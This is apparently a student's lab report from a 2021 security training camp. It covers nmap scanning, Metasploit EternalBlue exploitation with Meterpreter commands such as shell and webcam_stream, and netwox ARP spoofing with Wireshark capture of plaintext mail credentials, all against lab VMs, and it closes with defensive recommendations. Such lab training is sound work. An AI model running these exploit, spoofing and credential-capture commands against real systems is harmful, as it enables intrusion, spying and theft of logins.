信安冬令营实训报告(信息收集,主机渗透,内网渗透)

一丶摘要

XXX冬令营2021信安01班1月16日-1月20日为期5天的实训当中,学习了关于kali-Linuxnmapmetasploit frameworkwireshark抓包VMware Workstation虚拟机netwoxarp欺骗的专业技能知识,拓展了写报告小组协作的能力,并从实训中发现了一些安全漏洞,培养了安全意识

实验一实验二实验三
类别信息收集主机渗透内网渗透
技术nmap扫描、Nessus扫描MSF攻击arp欺骗
目的掌握信息,发现漏洞,便于渗透测试利用利用漏洞,获得shell捕获数据包,窃取信息
危害信息泄露恶意破坏,信息泄露信息泄露

二丶实训内容

实验一*信息收集

Nmap

目标

掌控信息,发现漏洞,便于渗透测试利用

主机发现
# 使用TCP扫描
nmap -sP 192.168.140.0/24	#使用ICMP协议ping
nmap -sP 192.168.140.0/24  	#使用ICMP协议ping
nmap -PS 192.168.140.0/24 	#使用SYN协议ping,不会在靶机log留下痕迹
nmap -PA 192.168.140.0/24 	#使用ACK协议ping
nmap -PU 192.168.140.0/24 	#使用UDP协议ping
#Tips:除了扫描网段,也可扫描域名以及ip段

图为使用ICMP协议扫描截图↑

端口扫描
nmap -sS 192.168.140.128   #使用SYN扫描win7开放端口
nmap -sS 192.168.140.132   #使用SYN扫描winxp开放端口
nmap -sT {ip}              #默认使用TCP扫描
nmap -sT {ip} -p {port}    #使用TCP扫描,制定端口
nmap -sA {ip}              #使用ACK扫描
nmap -sU {ip}              #使用UDP扫描
Tips:ip和port可以写成范围,如ip20-100,port 1-65535

图为使用SYN扫描win7的开放端口↑

图为使用SYN扫描winxp开放端口↑

图为使用SYN扫描winxp且指定端口为80↑

图为使用SYN扫描winxp且指定端口范围为50-300↑

开放服务和操作系统检测
nmap -sV 192.168.140.128    #探测winxp的开放服务
nmap -sV 192.168.140.132    #探测win7的开放服务

图为使用-sv参数探测winxp的开放服务↑

图为使用-sv参数探测win7的开放服务↑

图为探测winxp的操作系统↑

图为探测win7的操作系统↑

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-C84scSIt-1625299949219)(C:\Users\Polaris\AppData\Roaming\Typora\typora-user-images\image-20210116211443702.png)]

图为使用参数-A来检测winxp开放的服务版本与操作系统版本↑

图为使用参数-A来检测win7开放的服务版本与操作系统版本↑

脚本扫描
locate ms17-010 #查找要找的ms17-010的脚本文件
nmap -sS {ip} --script={scirptname} #使用nmap脚本扫描win7是否存在ms17-010漏洞

图为使用脚本来检测win7是否存在ms17-010漏洞↑

其他

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-NwRoZ9mX-1625299949225)(https://gitee.com/southerose/PictureBed/raw/master/img/nmap%E6%80%9D%E7%BB%B4%E5%AF%BC%E5%9B%BE.png)]

Nessus

目标

掌控信息,发现漏洞,便于渗透测试利用

开启服务
service nessusd start
进入扫描界面

端口:8334

https://127.0.0.1:8834

使用高级扫描

Tips:根据扫描的对象针对性开启扫描插件及其他服务,例如:扫描windows系统可以只开启扫描windows的插件,还可以指定扫描的端口等。

扫描win7

其他

参考文档

实验二*主机渗透

Metasploit

目标

利用ms07-010漏洞,获得shell

启动
msfconsole

搜索模块
search ms17-010

使用模块
use exploit/windows/smb/ms17_010_eternalblue

查看选项
show options

设置参数
set lhost {ip_local}
set rhost {ip_romote}
运行模块
run

命令执行
help #查看Meterpreter帮助
shell #远程命令行shell
webcam_stream #捕获摄像头流
getuid #查看当前用户
其他

详见MSF渗透测试指南PDF

实验三*内网渗透

ARP欺骗

目标

Kali充当中间人,捕获用户在Win7上使用Foxmail时收发邮件的数据包,并窃取登录名和授权码

组网

组建局域网(NAT模式下)

  • VM_Kali(充当中间人)

    IP:192.168.140.129

    MAC:00:0C:29:FB:07:11

  • VM_Win7

    IP:192.168.140.144

    MAC:00:0C:29:D6:6D:1B

  • 真实机

    IP:192.168.140.1

    MAC:00:50:56:C0:00:08

在Win7上安装foxmail

1.这里我使用163邮箱,根据帮助填写用户名及授权码↓

2.然后在账号里面把ssl前面的勾关了,因为要抓明文账号以及密码↓

安装netwox
#kali下
apt-get install netwox
伪造身份
Step1:
# kali伪造成Win7以欺骗网关
sudo netwox 33 -d eth0 -a {mac-kali} -b {mac-网关} -e 2 -f {mac-kali} -g {ip-win7} -h {mac-网关}  -i {ip-网关}

sudo netwox 33 -d eth0 -a 00:0C:29:FB:07:11 -b 00:50:56:C0:00:08 -e 2 -f 00:0C:29:FB:07:11 -g 192.168.140.144 -h 00:50:56:C0:00:08  -i 192.168.140.1


Step2:
# kali伪造成网关以欺骗Win7
netwox 33 -d eth0 -a {mac-kali} -b {mac-win7}  -e 2 -f {mac-kali}  -g {ip-网关} -h {mac-win7} -i {ip-win7}

netwox 33 -d eth0 -a 00:0C:29:FB:07:11 -b 00:0C:29:D6:6D:1B -e 2 -f 00:0C:29:FB:07:11  -g 192.168.140.1 -h 00:0C:29:D6:6D:1B -i 192.168.140.144

  • 这时Kali充当一个中间人
Wireshark抓取流量

1.在Kali里开始捕获eth0的流量↓

2.在foxmail里面点击收取↓

3.返回wireshark,只查看imap的包,发现账号和密码↓

其他

三、测试结果

  • 在本次渗透测试的目标中,第4组发现多处严重等级风险漏洞,这一级别的漏洞会威胁到系统安全性。

发现的问题

编号发现问题内容描述风险等程度
1MS系列漏洞通过永恒之蓝漏洞会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。严重
2局域网ARP欺骗通过发送伪造好的arp包,将受害机与网关欺骗。从而实现中间人窃取、偷听的目的。泄露敏感信息。严重

四、安全建议

  • 针对上述发现的问题,建议立即采取措施修补以免发送不可挽回的安全问题。下面的安全建议措施可供参考。

关于防护永恒之蓝漏洞的建议

  • 打开系统自动更新,将系统更新,或者前往微软官网,下载对应的补丁
  • 也可以直接关闭相对应的端口
  • 打开防火墙,配置相应的规则

关于防护局域网ARP欺骗的建议

  • 静态绑定IP和MAC的映射

  • 安装ARP防火墙

其他建议

  • 将不常用的有风险的端口关闭
  • 打开系统防火墙
  • 及时查看微软发布的更新补丁并按时更新系统
  • 了解最新信息安全资讯,及时防护新出现的漏洞
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值